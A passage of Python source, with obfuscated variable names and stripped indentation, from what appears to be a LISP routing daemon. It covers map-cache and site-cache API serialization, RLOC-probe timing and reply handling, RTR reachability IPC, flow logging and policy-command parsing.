iiiI1I [ "last-rloc-probe-reply" ] = lisp_print_elapsed ( iIiiI11iIIi11 )
iiiI1I [ "rloc-probe-rtt" ] = str ( rloc . rloc_probe_rtt )
iiiI1I [ "rloc-hop-count" ] = rloc . rloc_probe_hops
iiiI1I [ "recent-rloc-hop-counts" ] = rloc . recent_rloc_probe_hops
iiiI1I [ "rloc-probe-latency" ] = rloc . rloc_probe_latency
iiiI1I [ "recent-rloc-probe-latencies" ] = rloc . recent_rloc_probe_latencies
OOoo0o000 = [ ]
for OOOooOOoOO0o in rloc . recent_rloc_probe_rtts : OOoo0o000 . append ( str ( OOOooOOoOO0o ) )
iiiI1I [ "recent-rloc-probe-rtts" ] = OOoo0o000
return ( iiiI1I )
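#
# lisp_process_api_map_cache_entry
#
# Look up a single map-cache entry by instance-id, EID-prefix, and
# optional group-prefix, and return it in serialized form.
#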
def lisp_process_api_map_cache_entry ( parms ) :
oooo = parms [ "instance-id" ]
oooo = 0 if ( oooo == "" ) else int ( oooo )
o0Ooo0Oooo0o = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
o0Ooo0Oooo0o . store_prefix ( parms [ "eid-prefix" ] )
IIi11ii = o0Ooo0Oooo0o
O0oo0OoO0oo = o0Ooo0Oooo0o
oo0oOooo0O = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
if ( "group-prefix" in parms ) :
oo0oOooo0O . store_prefix ( parms [ "group-prefix" ] )
IIi11ii = oo0oOooo0O
iiooo0o0oO = [ ]
I11iiI1III = lisp_map_cache_lookup ( O0oo0OoO0oo , IIi11ii )
if ( I11iiI1III ) : o0o0O0O0Oooo0 , iiooo0o0oO = lisp_process_api_map_cache ( I11iiI1III , iiooo0o0oO )
return ( iiooo0o0oO )
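#
# lisp_process_api_site_cache_summary
#
# For each site, summarize every accept-more-specifics EID-prefix with the
# number of more-specific registrations and how many of them are
# currently registered.
#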
def lisp_process_api_site_cache_summary ( site_cache ) :
I1io0oOOooOoo0oO = { "site" : "" , "registrations" : [ ] }
oo0O00OOOOO = { "eid-prefix" : "" , "count" : 0 , "registered-count" : 0 }
IiiIIIiIIIii1II = { }
for iiii11I1 in site_cache . cache_sorted :
for ooOO00o in list ( site_cache . cache [ iiii11I1 ] . entries . values ( ) ) :
if ( ooOO00o . accept_more_specifics == False ) : continue
if ( ooOO00o . site . site_name not in IiiIIIiIIIii1II ) :
IiiIIIiIIIii1II [ ooOO00o . site . site_name ] = [ ]
oO0ooOOO = copy . deepcopy ( oo0O00OOOOO )
oO0ooOOO [ "eid-prefix" ] = ooOO00o . eid . print_prefix ( )
oO0ooOOO [ "count" ] = len ( ooOO00o . more_specific_registrations )
for i111ii1ii in ooOO00o . more_specific_registrations :
if ( i111ii1ii . registered ) : oO0ooOOO [ "registered-count" ] += 1
IiiIIIiIIIii1II [ ooOO00o . site . site_name ] . append ( oO0ooOOO )
iiooo0o0oO = [ ]
for IIiii in IiiIIIiIIIii1II :
I111 = copy . deepcopy ( I1io0oOOooOoo0oO )
I111 [ "site" ] = IIiii
I111 [ "registrations" ] = IiiIIIiIIIii1II [ IIiii ]
iiooo0o0oO . append ( I111 )
return ( iiooo0o0oO )
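#
# lisp_process_api_site_cache
#
# Walker callback to gather one site-cache entry. For (S,G) entries, walk
# the source-cache hanging off the group entry.
#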
def lisp_process_api_site_cache ( se , data ) :
if ( se . group . is_null ( ) ) : return ( lisp_gather_site_cache_data ( se , data ) )
if ( se . source_cache == None ) : return ( [ True , data ] )
data = se . source_cache . walk_cache ( lisp_gather_site_cache_data , data )
return ( [ True , data ] )
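#
# lisp_process_api_ms_or_mr
#
# Return the configured map-server (ms_or_mr is True) or map-resolver
# (False) matching the supplied "dns-name" or exact "address" parameter.
#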
def lisp_process_api_ms_or_mr ( ms_or_mr , data ) :
I1IIIi = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iiiiII = data [ "dns-name" ] if ( "dns-name" in data ) else None
if ( "address" in data ) :
I1IIIi . store_address ( data [ "address" ] )
oOO0 = { }
if ( ms_or_mr ) :
for oO00000oOO in list ( lisp_map_servers_list . values ( ) ) :
if ( iiiiII ) :
if ( iiiiII != oO00000oOO . dns_name ) : continue
else :
if ( I1IIIi . is_exact_match ( oO00000oOO . map_server ) == False ) : continue
oOO0 [ "dns-name" ] = oO00000oOO . dns_name
oOO0 [ "address" ] = oO00000oOO . map_server . print_address_no_iid ( )
oOO0 [ "ms-name" ] = "" if oO00000oOO . ms_name == None else oO00000oOO . ms_name
return ( [ oOO0 ] )
else :
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( iiiiII ) :
if ( iiiiII != iii1i . dns_name ) : continue
else :
if ( I1IIIi . is_exact_match ( iii1i . map_resolver ) == False ) : continue
oOO0 [ "dns-name" ] = iii1i . dns_name
oOO0 [ "address" ] = iii1i . map_resolver . print_address_no_iid ( )
oOO0 [ "mr-name" ] = "" if iii1i . mr_name == None else iii1i . mr_name
return ( [ oOO0 ] )
return ( [ ] )
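#
# lisp_process_api_database_mapping
#
# Serialize each database-mapping: EID and group prefixes plus each RLOC's
# address, RLOC-name, interface, and translated RLOC.
#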
def lisp_process_api_database_mapping ( ) :
iiooo0o0oO = [ ]
for OoO0oO in lisp_db_list :
oo0O00OOOOO = { }
oo0O00OOOOO [ "eid-prefix" ] = OoO0oO . eid . print_prefix ( )
if ( OoO0oO . group . is_null ( ) == False ) :
oo0O00OOOOO [ "group-prefix" ] = OoO0oO . group . print_prefix ( )
OOOO00 = [ ]
for iiiI1I in OoO0oO . rloc_set :
iIIiI11 = { }
if ( iiiI1I . rloc . is_null ( ) == False ) :
iIIiI11 [ "rloc" ] = iiiI1I . rloc . print_address_no_iid ( )
if ( iiiI1I . rloc_name != None ) : iIIiI11 [ "rloc-name" ] = iiiI1I . rloc_name
if ( iiiI1I . interface != None ) : iIIiI11 [ "interface" ] = iiiI1I . interface
oo00oOO = iiiI1I . translated_rloc
if ( oo00oOO . is_null ( ) == False ) :
iIIiI11 [ "translated-rloc" ] = oo00oOO . print_address_no_iid ( )
if ( iIIiI11 != { } ) : OOOO00 . append ( iIIiI11 )
oo0O00OOOOO [ "rlocs" ] = OOOO00
iiooo0o0oO . append ( oo0O00OOOOO )
return ( iiooo0o0oO )
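#
# lisp_gather_site_cache_data
#
# Serialize one site-EID entry: registration state and timestamps, last
# registerer, accept-more-specifics/dynamic flags, site-id, xtr-id, and
# the registered RLOC-set. Appends the dictionary to the supplied array.
#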
def lisp_gather_site_cache_data ( se , data ) :
oo0O00OOOOO = { }
oo0O00OOOOO [ "site-name" ] = se . site . site_name
oo0O00OOOOO [ "instance-id" ] = str ( se . eid . instance_id )
oo0O00OOOOO [ "eid-prefix" ] = se . eid . print_prefix_no_iid ( )
if ( se . group . is_null ( ) == False ) :
oo0O00OOOOO [ "group-prefix" ] = se . group . print_prefix_no_iid ( )
oo0O00OOOOO [ "registered" ] = "yes" if se . registered else "no"
oo0O00OOOOO [ "first-registered" ] = lisp_print_elapsed ( se . first_registered )
oo0O00OOOOO [ "last-registered" ] = lisp_print_elapsed ( se . last_registered )
IiI = se . last_registerer
IiI = "none" if IiI . is_null ( ) else IiI . print_address ( )
oo0O00OOOOO [ "last-registerer" ] = IiI
oo0O00OOOOO [ "ams" ] = "yes" if ( se . accept_more_specifics ) else "no"
oo0O00OOOOO [ "dynamic" ] = "yes" if ( se . dynamic ) else "no"
oo0O00OOOOO [ "site-id" ] = str ( se . site_id )
if ( se . xtr_id_present ) :
oo0O00OOOOO [ "xtr-id" ] = "0x" + lisp_hex_string ( se . xtr_id )
OO00O000OOO = [ ]
for iIIiI11 in se . registered_rlocs :
iiiI1I = { }
iiiI1I [ "address" ] = iIIiI11 . rloc . print_address_no_iid ( ) if iIIiI11 . rloc_exists ( ) else "none"
if ( iIIiI11 . geo ) : iiiI1I [ "geo" ] = iIIiI11 . geo . print_geo ( )
if ( iIIiI11 . elp ) : iiiI1I [ "elp" ] = iIIiI11 . elp . print_elp ( False )
if ( iIIiI11 . rle ) : iiiI1I [ "rle" ] = iIIiI11 . rle . print_rle ( False , True )
if ( iIIiI11 . json ) : iiiI1I [ "json" ] = iIIiI11 . json . print_json ( False )
if ( iIIiI11 . rloc_name ) : iiiI1I [ "rloc-name" ] = iIIiI11 . rloc_name
iiiI1I [ "uptime" ] = lisp_print_elapsed ( iIIiI11 . uptime )
iiiI1I [ "upriority" ] = str ( iIIiI11 . priority )
iiiI1I [ "uweight" ] = str ( iIIiI11 . weight )
iiiI1I [ "mpriority" ] = str ( iIIiI11 . mpriority )
iiiI1I [ "mweight" ] = str ( iIIiI11 . mweight )
OO00O000OOO . append ( iiiI1I )
oo0O00OOOOO [ "registered-rlocs" ] = OO00O000OOO
data . append ( oo0O00OOOOO )
return ( [ True , data ] )
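#
# lisp_process_api_site_cache_entry
#
# Look up a single site-cache entry by instance-id, EID-prefix, and
# optional group-prefix, and return it in serialized form.
#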
def lisp_process_api_site_cache_entry ( parms ) :
oooo = parms [ "instance-id" ]
oooo = 0 if ( oooo == "" ) else int ( oooo )
o0Ooo0Oooo0o = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
o0Ooo0Oooo0o . store_prefix ( parms [ "eid-prefix" ] )
oo0oOooo0O = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
if ( "group-prefix" in parms ) :
oo0oOooo0O . store_prefix ( parms [ "group-prefix" ] )
iiooo0o0oO = [ ]
ooOO00o = lisp_site_eid_lookup ( o0Ooo0Oooo0o , oo0oOooo0O , False )
if ( ooOO00o ) : lisp_gather_site_cache_data ( ooOO00o , iiooo0o0oO )
return ( iiooo0o0oO )
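#
# lisp_get_interface_instance_id
#
# Return the instance-ID to use for a packet that arrived on 'device'. For
# multi-tenant interfaces, choose the one whose multi-tenant EID-prefix is
# the longest match for source_eid; otherwise use the interface's
# configured instance-ID, falling back to lisp_default_iid.
#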
def lisp_get_interface_instance_id ( device , source_eid ) :
i111IIiIiiI1 = None
if ( device in lisp_myinterfaces ) :
i111IIiIiiI1 = lisp_myinterfaces [ device ]
if ( i111IIiIiiI1 == None or i111IIiIiiI1 . instance_id == None ) :
return ( lisp_default_iid )
oooo = i111IIiIiiI1 . get_instance_id ( )
if ( source_eid == None ) : return ( oooo )
IiI11I1IIIiIi = source_eid . instance_id
O0O0OO0o0 = None
for i111IIiIiiI1 in lisp_multi_tenant_interfaces :
if ( i111IIiIiiI1 . device != device ) : continue
Oo0OoOI1I11iII1I1i = i111IIiIiiI1 . multi_tenant_eid
source_eid . instance_id = Oo0OoOI1I11iII1I1i . instance_id
if ( source_eid . is_more_specific ( Oo0OoOI1I11iII1I1i ) == False ) : continue
if ( O0O0OO0o0 == None or O0O0OO0o0 . multi_tenant_eid . mask_len < Oo0OoOI1I11iII1I1i . mask_len ) :
O0O0OO0o0 = i111IIiIiiI1
source_eid . instance_id = IiI11I1IIIiIi
if ( O0O0OO0o0 == None ) : return ( oooo )
return ( O0O0OO0o0 . get_instance_id ( ) )
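#
# lisp_allow_dynamic_eid
#
# If 'device' is configured with a dynamic-EID prefix matching 'eid',
# return the interface name to use (the configured dynamic-eid device if
# present, else 'device'); otherwise return None.
#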
def lisp_allow_dynamic_eid ( device , eid ) :
if ( device not in lisp_myinterfaces ) : return ( None )
i111IIiIiiI1 = lisp_myinterfaces [ device ]
Oo0o00OOo0 = device if i111IIiIiiI1 . dynamic_eid_device == None else i111IIiIiiI1 . dynamic_eid_device
if ( i111IIiIiiI1 . does_dynamic_eid_match ( eid ) ) : return ( Oo0o00OOo0 )
return ( None )
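#
# lisp_start_rloc_probe_timer
#
# (Re)arm the global RLOC-probe timer so lisp_process_rloc_probe_timer()
# runs after 'interval' seconds.
#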
def lisp_start_rloc_probe_timer ( interval , lisp_sockets ) :
global lisp_rloc_probe_timer
if ( lisp_rloc_probe_timer != None ) : lisp_rloc_probe_timer . cancel ( )
o00ooOOOo = lisp_process_rloc_probe_timer
oo0O00O0O0O00Ooo = threading . Timer ( interval , o00ooOOOo , [ lisp_sockets ] )
lisp_rloc_probe_timer = oo0O00O0O0O00Ooo
oo0O00O0O0O00Ooo . start ( )
return
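#
# lisp_show_rloc_probe_list
#
# Debug routine: print each entry of the global lisp_rloc_probe_list.
#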
def lisp_show_rloc_probe_list ( ) :
lprint ( bold ( "----- RLOC-probe-list -----" , False ) )
for III in lisp_rloc_probe_list :
oOoO00OoO0 = lisp_rloc_probe_list [ III ]
lprint ( "RLOC {}:" . format ( III ) )
for iiiI1I , oO0ooOOO , Oo in oOoO00OoO0 :
lprint ( " [{}, {}, {}, {}]" . format ( hex ( id ( iiiI1I ) ) , oO0ooOOO . print_prefix ( ) ,
Oo . print_prefix ( ) , iiiI1I . translated_port ) )
lprint ( bold ( "---------------------------" , False ) )
return
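#
# lisp_mark_rlocs_for_other_eids
#
# When an RLOC times out, mark the same RLOC unreachable for every other
# EID that uses it, and push the updated map-cache entries to the other
# LISP processes over IPC.
#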
def lisp_mark_rlocs_for_other_eids ( eid_list ) :
iIIiI11 , oO0ooOOO , Oo = eid_list [ 0 ]
iI1ii11I = [ lisp_print_eid_tuple ( oO0ooOOO , Oo ) ]
for iIIiI11 , oO0ooOOO , Oo in eid_list [ 1 : : ] :
iIIiI11 . state = LISP_RLOC_UNREACH_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
iI1ii11I . append ( lisp_print_eid_tuple ( oO0ooOOO , Oo ) )
O00OOO0 = bold ( "unreachable" , False )
IIIOo0O = red ( iIIiI11 . rloc . print_address_no_iid ( ) , False )
for o0Ooo0Oooo0o in iI1ii11I :
oO0ooOOO = green ( o0Ooo0Oooo0o , False )
lprint ( "RLOC {} went {} for EID {}" . format ( IIIOo0O , O00OOO0 , oO0ooOOO ) )
for iIIiI11 , oO0ooOOO , Oo in eid_list :
I11iiI1III = lisp_map_cache . lookup_cache ( oO0ooOOO , True )
if ( I11iiI1III ) : lisp_write_ipc_map_cache ( True , I11iiI1III )
return
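#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe run. Restart the timer, then walk the RLOC-probe
# list: suppress probes for gleaned EIDs, duplicate RLOCs, RLOCs in down
# state, RLOCs still awaiting a reply, and RLOCs with a recent
# nonce-echo; declare RLOCs unreachable when replies time out or the
# default-route next-hop went away; otherwise send an RLOC-probe
# Map-Request, installing a host route per next-hop for multihomed RLOCs.
# Probes are paced with a 20-ms sleep every 10 messages.
#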
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
lisp_set_exception ( )
lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
if ( lisp_rloc_probing == False ) : return
if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
ooi1I = lisp_get_default_route_next_hops ( )
lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
O0oo0oOo = 0
Oooooo0OOO = bold ( "RLOC-probe" , False )
for Iii1iIi1i in list ( lisp_rloc_probe_list . values ( ) ) :
ii11ii1 = None
for oO00O , o0Ooo0Oooo0o , oo0oOooo0O in Iii1iIi1i :
O0O0 = oO00O . rloc . print_address_no_iid ( )
Ooo00O , ooiiIIiii , ii1I1I1iII = lisp_allow_gleaning ( o0Ooo0Oooo0o , None , oO00O )
if ( Ooo00O and ooiiIIiii == False ) :
oO0ooOOO = green ( o0Ooo0Oooo0o . print_address ( ) , False )
O0O0 += ":{}" . format ( oO00O . translated_port )
lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( O0O0 , False ) , oO0ooOOO ) )
continue
if ( oO00O . down_state ( ) ) : continue
if ( ii11ii1 ) :
oO00O . last_rloc_probe_nonce = ii11ii1 . last_rloc_probe_nonce
if ( ii11ii1 . translated_port == oO00O . translated_port and ii11ii1 . rloc_name == oO00O . rloc_name ) :
oO0ooOOO = green ( lisp_print_eid_tuple ( o0Ooo0Oooo0o , oo0oOooo0O ) , False )
lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( O0O0 , False ) , oO0ooOOO ) )
oO00O . last_rloc_probe = ii11ii1 . last_rloc_probe
continue
OoII1 = None
iIIiI11 = None
while ( True ) :
iIIiI11 = oO00O if iIIiI11 == None else iIIiI11 . next_rloc
if ( iIIiI11 == None ) : break
if ( iIIiI11 . rloc_next_hop != None ) :
if ( iIIiI11 . rloc_next_hop not in ooi1I ) :
if ( iIIiI11 . up_state ( ) ) :
IiI11I111 , iii1111ii = iIIiI11 . rloc_next_hop
iIIiI11 . state = LISP_RLOC_UNREACH_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( iIIiI11 . rloc , False )
O00OOO0 = bold ( "unreachable" , False )
lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( iii1111ii , IiI11I111 ,
red ( O0O0 , False ) , O00OOO0 ) )
continue
i11iII11I1III = iIIiI11 . last_rloc_probe
I1i1IIIi1iii = 0 if i11iII11I1III == None else time . time ( ) - i11iII11I1III
if ( iIIiI11 . unreach_state ( ) and I1i1IIIi1iii < LISP_RLOC_PROBE_INTERVAL ) :
lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( O0O0 , False ) ) )
continue
I111Ii1I1I1iI = lisp_get_echo_nonce ( None , O0O0 )
if ( I111Ii1I1I1iI and I111Ii1I1I1iI . request_nonce_timeout ( ) ) :
iIIiI11 . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
O00OOO0 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( O0O0 , False ) , O00OOO0 ) )
lisp_update_rtr_updown ( iIIiI11 . rloc , False )
continue
if ( I111Ii1I1I1iI and I111Ii1I1I1iI . recently_echoed ( ) ) :
lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( O0O0 , False ) ) )
continue
if ( iIIiI11 . last_rloc_probe != None ) :
i11iII11I1III = iIIiI11 . last_rloc_probe_reply
if ( i11iII11I1III == None ) : i11iII11I1III = 0
I1i1IIIi1iii = time . time ( ) - i11iII11I1III
if ( iIIiI11 . up_state ( ) and I1i1IIIi1iii >= LISP_RLOC_PROBE_REPLY_WAIT ) :
iIIiI11 . state = LISP_RLOC_UNREACH_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( iIIiI11 . rloc , False )
O00OOO0 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, probe it" . format ( red ( O0O0 , False ) , O00OOO0 ) )
lisp_mark_rlocs_for_other_eids ( Iii1iIi1i )
iIIiI11 . last_rloc_probe = lisp_get_timestamp ( )
OOoOo0o0oO = "" if iIIiI11 . unreach_state ( ) == False else " unreachable"
iIiI1iIiII1 = ""
iii1111ii = None
if ( iIIiI11 . rloc_next_hop != None ) :
IiI11I111 , iii1111ii = iIIiI11 . rloc_next_hop
lisp_install_host_route ( O0O0 , iii1111ii , True )
iIiI1iIiII1 = ", send on nh {}({})" . format ( iii1111ii , IiI11I111 )
OOOooOOoOO0o = iIIiI11 . print_rloc_probe_rtt ( )
OOOO0oO00 = O0O0
if ( iIIiI11 . translated_port != 0 ) :
OOOO0oO00 += ":{}" . format ( iIIiI11 . translated_port )
OOOO0oO00 = red ( OOOO0oO00 , False )
if ( iIIiI11 . rloc_name != None ) :
OOOO0oO00 += " (" + blue ( iIIiI11 . rloc_name , False ) + ")"
lprint ( "Send {}{} {}, last rtt: {}{}" . format ( Oooooo0OOO , OOoOo0o0oO ,
OOOO0oO00 , OOOooOOoOO0o , iIiI1iIiII1 ) )
if ( iIIiI11 . rloc_next_hop != None ) :
OoII1 = lisp_get_host_route_next_hop ( O0O0 )
if ( OoII1 ) : lisp_install_host_route ( O0O0 , OoII1 , False )
if ( iIIiI11 . rloc . is_null ( ) ) :
iIIiI11 . rloc . copy_address ( oO00O . rloc )
OoiIii11i11i = None if ( oo0oOooo0O . is_null ( ) ) else o0Ooo0Oooo0o
oOOOOOo0o = o0Ooo0Oooo0o if ( oo0oOooo0O . is_null ( ) ) else oo0oOooo0O
lisp_send_map_request ( lisp_sockets , 0 , OoiIii11i11i , oOOOOOo0o , iIIiI11 )
ii11ii1 = oO00O
if ( iii1111ii ) : lisp_install_host_route ( O0O0 , iii1111ii , False )
if ( OoII1 ) : lisp_install_host_route ( O0O0 , OoII1 , True )
O0oo0oOo += 1
if ( ( O0oo0oOo % 10 ) == 0 ) : time . sleep ( 0.020 )
lprint ( "---------- End RLOC Probing ----------" )
return
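#
# lisp_update_rtr_updown
#
# ITR only: when an RTR's reachability changes and we are registering a
# filtered RTR-list (not all RTRs), tell the lisp-etr process over IPC so
# it can adjust what it registers.
#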
def lisp_update_rtr_updown ( rtr , updown ) :
global lisp_ipc_socket
if 15 - 15: OoO0O00
if 37 - 37: OoO0O00 . OoooooooOO - OOooOOo
if 34 - 34: o0oOOo0O0Ooo + iIii1I11I1II1 / o0oOOo0O0Ooo / ooOoO0o
if 53 - 53: II111iiii / iIii1I11I1II1
if ( lisp_i_am_itr == False ) : return
if ( lisp_register_all_rtrs ) : return
I1O0OOOoOOOO0 = rtr . print_address_no_iid ( )
if ( I1O0OOOoOOOO0 not in lisp_rtr_list ) : return
updown = "up" if updown else "down"
lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
red ( I1O0OOOoOOOO0 , False ) , bold ( updown , False ) ) )
OO = "rtr%{}%{}" . format ( I1O0OOOoOOOO0 , updown )
OO = lisp_command_ipc ( OO , "lisp-itr" )
lisp_ipc ( OO , lisp_ipc_socket , "lisp-etr" )
return
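#
# lisp_process_rloc_probe_reply
#
# Process an RLOC-probe Map-Reply. For a multicast RLOC, update (or
# create) the per-member state in mrloc.multicast_rloc_probe_list. For
# unicast, find the probe-list entry by RLOC address, address:port, or
# the packet source, and update probe state for every EID using that
# RLOC.
#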
def lisp_process_rloc_probe_reply ( rloc_entry , source , port , map_reply , ttl ,
mrloc ) :
iIIiI11 = rloc_entry . rloc
o0Oo0o = map_reply . nonce
o000O000oo = map_reply . hop_count
Oooooo0OOO = bold ( "RLOC-probe reply" , False )
I1I11iii1I1 = iIIiI11 . print_address_no_iid ( )
o0oo0OoO0O = source . print_address_no_iid ( )
oo00O0000o00 = lisp_rloc_probe_list
OoO00 = rloc_entry . json . json_string if rloc_entry . json else None
i1 = lisp_get_timestamp ( )
if ( mrloc != None ) :
OOOOOO0O00O00 = mrloc . rloc . print_address_no_iid ( )
if ( I1I11iii1I1 not in mrloc . multicast_rloc_probe_list ) :
o00oOo0OOoo = lisp_rloc ( )
o00oOo0OOoo = copy . deepcopy ( mrloc )
o00oOo0OOoo . rloc . copy_address ( iIIiI11 )
o00oOo0OOoo . multicast_rloc_probe_list = { }
mrloc . multicast_rloc_probe_list [ I1I11iii1I1 ] = o00oOo0OOoo
o00oOo0OOoo = mrloc . multicast_rloc_probe_list [ I1I11iii1I1 ]
o00oOo0OOoo . last_rloc_probe_nonce = mrloc . last_rloc_probe_nonce
o00oOo0OOoo . last_rloc_probe = mrloc . last_rloc_probe
iiiI1I , o0Ooo0Oooo0o , oo0oOooo0O = lisp_rloc_probe_list [ OOOOOO0O00O00 ] [ 0 ]
o00oOo0OOoo . process_rloc_probe_reply ( i1 , o0Oo0o , o0Ooo0Oooo0o , oo0oOooo0O , o000O000oo , ttl , OoO00 )
mrloc . process_rloc_probe_reply ( i1 , o0Oo0o , o0Ooo0Oooo0o , oo0oOooo0O , o000O000oo , ttl , OoO00 )
return
IiI = I1I11iii1I1
if ( IiI not in oo00O0000o00 ) :
IiI += ":" + str ( port )
if ( IiI not in oo00O0000o00 ) :
IiI = o0oo0OoO0O
if ( IiI not in oo00O0000o00 ) :
IiI += ":" + str ( port )
lprint ( " Received unsolicited {} from {}/{}, port {}" . format ( Oooooo0OOO , red ( I1I11iii1I1 , False ) , red ( o0oo0OoO0O ,
False ) , port ) )
return
for iIIiI11 , o0Ooo0Oooo0o , oo0oOooo0O in lisp_rloc_probe_list [ IiI ] :
if ( lisp_i_am_rtr ) :
if ( iIIiI11 . translated_port != 0 and iIIiI11 . translated_port != port ) :
continue
iIIiI11 . process_rloc_probe_reply ( i1 , o0Oo0o , o0Ooo0Oooo0o , oo0oOooo0O , o000O000oo , ttl , OoO00 )
return
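#
# lisp_db_list_length
#
# Count database-mapping entries, counting each dynamic-EID and each
# instance-ID in an IID-range individually.
#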
def lisp_db_list_length ( ) :
O0oo0oOo = 0
for OoO0oO in lisp_db_list :
O0oo0oOo += len ( OoO0oO . dynamic_eids ) if OoO0oO . dynamic_eid_configured ( ) else 1
O0oo0oOo += len ( OoO0oO . eid . iid_list )
return ( O0oo0oOo )
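#
# lisp_is_myeid
#
# Return True if 'eid' falls within any configured database-mapping
# EID-prefix.
#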
def lisp_is_myeid ( eid ) :
for OoO0oO in lisp_db_list :
if ( eid . is_more_specific ( OoO0oO . eid ) ) : return ( True )
return ( False )
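#
# lisp_format_macs
#
# Format two 12-hex-digit MAC address strings as
# "xxxx-xxxx-xxxx -> xxxx-xxxx-xxxx" for logging.
#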
def lisp_format_macs ( sa , da ) :
sa = sa [ 0 : 4 ] + "-" + sa [ 4 : 8 ] + "-" + sa [ 8 : 12 ]
da = da [ 0 : 4 ] + "-" + da [ 4 : 8 ] + "-" + da [ 8 : 12 ]
return ( "{} -> {}" . format ( sa , da ) )
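#
# lisp_get_echo_nonce
#
# Return the lisp_nonce_echo_list entry for an RLOC (by address or
# string), or None when nonce-echoing is disabled or no state exists.
#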
def lisp_get_echo_nonce ( rloc , rloc_str ) :
if ( lisp_nonce_echoing == False ) : return ( None )
if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )
I111Ii1I1I1iI = None
if ( rloc_str in lisp_nonce_echo_list ) :
I111Ii1I1I1iI = lisp_nonce_echo_list [ rloc_str ]
return ( I111Ii1I1I1iI )
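#
# lisp_decode_dist_name
#
# Remove a null-terminated distinguished-name from the front of 'packet'.
# Returns (remaining-packet, name), or [None, None] if the name exceeds
# 255 bytes.
#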
def lisp_decode_dist_name ( packet ) :
O0oo0oOo = 0
IIiIiii1I1i = b""
while ( packet [ 0 : 1 ] != b"\x00" ) :
if ( O0oo0oOo == 255 ) : return ( [ None , None ] )
IIiIiii1I1i += packet [ 0 : 1 ]
packet = packet [ 1 : : ]
O0oo0oOo += 1
packet = packet [ 1 : : ]
return ( packet , IIiIiii1I1i . decode ( ) )
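#
# lisp_write_flow_log
#
# Append each buffered flow record to ./logs/lisp-flow.log and free the
# flow-log array.
#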
def lisp_write_flow_log ( flow_log ) :
o0OoO0 = open ( "./logs/lisp-flow.log" , "a" )
O0oo0oOo = 0
for oo000o in flow_log :
Oo00oo = oo000o [ 3 ]
OoooO0O0o0oOO = Oo00oo . print_flow ( oo000o [ 0 ] , oo000o [ 1 ] , oo000o [ 2 ] )
o0OoO0 . write ( OoooO0O0o0oOO )
O0oo0oOo += 1
o0OoO0 . close ( )
del ( flow_log )
O0oo0oOo = bold ( str ( O0oo0oOo ) , False )
lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( O0oo0oOo ) )
return
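#
# lisp_policy_command
#
# Build a lisp_policy() from a "lisp policy" configuration command. Each
# kv_pair value is an array with one element per datetime-range clause;
# fill in per-clause match criteria (instance-id, source/dest EID and
# RLOC, rloc/geo/elp/rle/json names, datetime bounds) and the policy-wide
# "set-*" actions.
#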
def lisp_policy_command ( kv_pair ) :
iIIiiIi = lisp_policy ( "" )
I1oO0 = None
o00ooOO = [ ]
for iIi1iIIIiIiI in range ( len ( kv_pair [ "datetime-range" ] ) ) :
o00ooOO . append ( lisp_policy_match ( ) )
for oO0OoO000oO0o in list ( kv_pair . keys ( ) ) :
oOO0 = kv_pair [ oO0OoO000oO0o ]
if ( oO0OoO000oO0o == "instance-id" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( i1i . source_eid == None ) :
i1i . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if ( i1i . dest_eid == None ) :
i1i . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
i1i . source_eid . instance_id = int ( Ooo0oO0O00o0 )
i1i . dest_eid . instance_id = int ( Ooo0oO0O00o0 )
if ( oO0OoO000oO0o == "source-eid" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( i1i . source_eid == None ) :
i1i . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
oooo = i1i . source_eid . instance_id
i1i . source_eid . store_prefix ( Ooo0oO0O00o0 )
i1i . source_eid . instance_id = oooo
if ( oO0OoO000oO0o == "destination-eid" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
if ( i1i . dest_eid == None ) :
i1i . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
oooo = i1i . dest_eid . instance_id
i1i . dest_eid . store_prefix ( Ooo0oO0O00o0 )
i1i . dest_eid . instance_id = oooo
if ( oO0OoO000oO0o == "source-rloc" ) :
for iIi1iIIIiIiI in range ( len ( o00ooOO ) ) :
Ooo0oO0O00o0 = oOO0 [ iIi1iIIIiIiI ]
if ( Ooo0oO0O00o0 == "" ) : continue
i1i = o00ooOO [ iIi1iIIIiIiI ]
